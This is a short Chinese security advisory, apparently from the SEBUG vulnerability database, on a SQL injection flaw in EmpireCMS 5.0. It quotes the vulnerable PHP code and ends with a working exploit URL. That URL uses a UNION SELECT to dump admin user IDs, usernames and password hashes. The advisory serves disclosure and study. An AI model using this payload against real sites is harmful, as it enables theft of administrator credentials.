还普遍存在的帝国cms漏洞

发布时间:2008-08-17
影响版本:
帝国ECMS 5.0
漏洞描述:
漏洞文件 /e/member/list/index.php文件:
内容如下：
if($sear)
{
$keyboard=RepPostVar2($_GET['keyboard']);
if($keyboard)
{
$add.=$where.$user_username." like '%$keyboard%'";
}
$search.="&sear=1&keyboard=$keyboard";
}

判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为
空就直接把keyboard带入查询产生注射漏洞.
<*参考
http://www.sebug.net/vulndb/3860/
http://www.nukeblog.cn
*>
SEBUG安全建议:
暂无
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char
(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*

文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: